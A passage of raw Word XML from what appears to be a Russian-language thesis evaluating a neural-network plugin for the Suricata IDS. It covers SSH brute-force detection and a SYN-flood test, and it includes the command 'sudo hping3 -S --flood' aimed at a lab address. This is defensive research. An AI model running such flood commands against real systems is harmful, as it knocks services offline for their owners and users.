        <w:t>В отличие от веб-перебора, атака на SSH создаёт характерный паттерн сетевого поведения — множество коротких соединений на порт 22 с высокой частотой с одного адреса. Трафик SSH зашифрован, однако метаданные потоков остаются доступны для анализа.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Процесс обнаружения атаки показан на рисунке 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102CBD91" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="0010509B" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F712D08" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00837241" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D70BA9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1546AE8A" wp14:editId="6F019571">
            <wp:extent cx="6296560" cy="3143250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1382617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17971" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId42"/>
                    <a:srcRect t="2235"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6312604" cy="3151259"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55214D91" w14:textId="0EDE05B9" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004961D0" w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение перебора паролей к SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D3A83" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="639DF2A9" w14:textId="2ACF0BE9" w:rsidR="00D70BA9" w:rsidRDefault="008E0171" w:rsidP="0056519B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>394</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE8E48" w14:textId="04703A5F" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 3. Атака на отказ в обслуживании </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3558DE" w14:textId="3691D0D5"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844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для моделирования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-атаки применялась утилита hping3</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6" w:rsidRPr="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [1</w:t>
      </w:r>
      <w:r w:rsidR="006D0511" w:rsidRPr="006D0511">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6" w:rsidRPr="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в режиме SYN-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — массовой отправки TCP SYN-пакетов на порт 80 целевого узла:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67868B36" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="00844957" w:rsidRDefault="000A1CD6" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9F081B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hping3 -S --flood -V -p 80 192.168.0.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9344BC" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRPr="00ED4CBB" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3306A3EA" w14:textId="1C1F7E1F"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5D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данная</w:t>
      </w:r>
      <w:r w:rsidRPr="00844957">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атака приводит к исчерпанию ресурсов целевой системы путём заполнения таблицы TCP-соединений незавершёнными сессиями.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Процесс обнаружения показан на рисунке 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB1303" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A52D1D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6260">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2392DFD3" wp14:editId="54A15BDF">
            <wp:extent cx="5791541" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85003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3149" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5799904" cy="2670851"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C06EE7" w14:textId="5B45DED2" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 2</w:t>
      </w:r>
      <w:r w:rsidR="00D70BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="004961D0" w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение атаки на отказ в обслуживании</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B64B1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752CC115" w14:textId="77777777" w:rsidR="005C39E4" w:rsidRDefault="008E0171" w:rsidP="005C39E4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Нейросетевой плагин зафиксировал аномалию, сформировав более 20 000 срабатываний — каждый поток с SYN-пакетами был интерпретирован как отклонение от нормальной модели трафика. Столь высокое число срабатываний объясняется архитектурой плагина</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> он анализирует каждый сетевой поток независимо, не объединяя однотипные события в группы. При SYN-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаке генерируются тысячи коротких потоков, каждый из которых получает отдельный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алерт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. С точки зрения обнаружения это является корректным поведением — атака выявлена, однако с точки зрения практического использования такое количество срабатываний существенно затрудняет работу администратора. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0002ACCD" w14:textId="0B8129C9" w:rsidR="008E0171" w:rsidRPr="001331E6" w:rsidRDefault="008E0171" w:rsidP="005C39E4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Решением может служить введение механизма агрегации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — объединение однотипных срабатываний с одного адреса за заданный промежуток времени в один инцидент. Данный вопрос подробнее рассмотрен в разделе 3.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ABE76E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001331E6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> успешно обнаружила SYN-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> атаку, используя встроенный механизм </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001331E6">
        <w:rPr>
